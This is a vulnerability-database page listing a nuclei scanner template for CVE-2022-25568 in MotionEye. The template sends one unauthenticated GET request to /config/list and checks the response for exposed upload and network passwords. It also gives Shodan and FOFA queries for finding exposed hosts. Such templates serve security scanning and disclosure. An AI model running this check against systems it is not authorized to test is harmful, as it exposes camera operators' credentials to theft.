Lucene search

K

MotionEye Config Info Disclosure

🗓️ 10 Oct 2023 21:40:01Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 10 Views

MotionEye Config Info Disclosure allows access to sensitive information via a GET request to /config/lis

Show more
Related
Refs
Code
ReporterTitlePublishedViews
Family
NVD
CVE-2022-25568
24 Mar 202217:15
nvd
CVE
CVE-2022-25568
24 Mar 202217:15
cve
Cvelist
CVE-2022-25568
24 Mar 202216:40
cvelist
Prion
Design/Logic Flaw
24 Mar 202217:15
prion
OSV
CVE-2022-25568
24 Mar 202217:15
osv
Github Security Blog
MotionEye allows attackers to access sensitive information
25 Mar 202200:00
github
id: CVE-2022-25568

info:
  name: MotionEye Config Info Disclosure
  author: DhiyaneshDK
  severity: high
  description: |
    MotionEye v0.42.1 and below allows attackers to access sensitive information via a GET request to /config/list. To exploit this vulnerability, a regular user password must be unconfigured.
  reference:
    - https://www.pizzapower.me/2022/02/17/motioneye-config-info-disclosure/
    - https://github.com/ccrisan/motioneye/issues/2292
    - https://nvd.nist.gov/vuln/detail/cve-2022-25568
    - https://github.com/KayCHENvip/vulnerability-poc
    - https://github.com/Miraitowa70/POC-Notes
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-25568
    cwe-id: CWE-1188
    epss-score: 0.01501
    epss-percentile: 0.86918
    cpe: cpe:2.3:a:motioneye_project:motioneye:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: motioneye_project
    product: motioneye
    shodan-query:
      - html:"MotionEye"
      - http.html:"motioneye"
    fofa-query: body="motioneye"
  tags: cve,cve2022,motioneye,config,motioneye_project

http:
  - method: GET
    path:
      - "{{BaseURL}}/config/list"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "upload_password"
          - "network_password"
        condition: and

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 490a0046304402202a04c9eb75eb5e331d4cc22e1e250a668b9efa47cfcca6c0b870bdbe4c78e12902201b5b0dad963c7bdf1f796d4a086c3b66c79b11f91757bf9eea69e5173793735d:922c64590222798bb761d5b6d8e72950

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
10 Oct 2023 21:01Current
7.4High risk
Vulners AI Score7.4
CVSS24.3
CVSS37.5
EPSS0.01579
10
.json
Report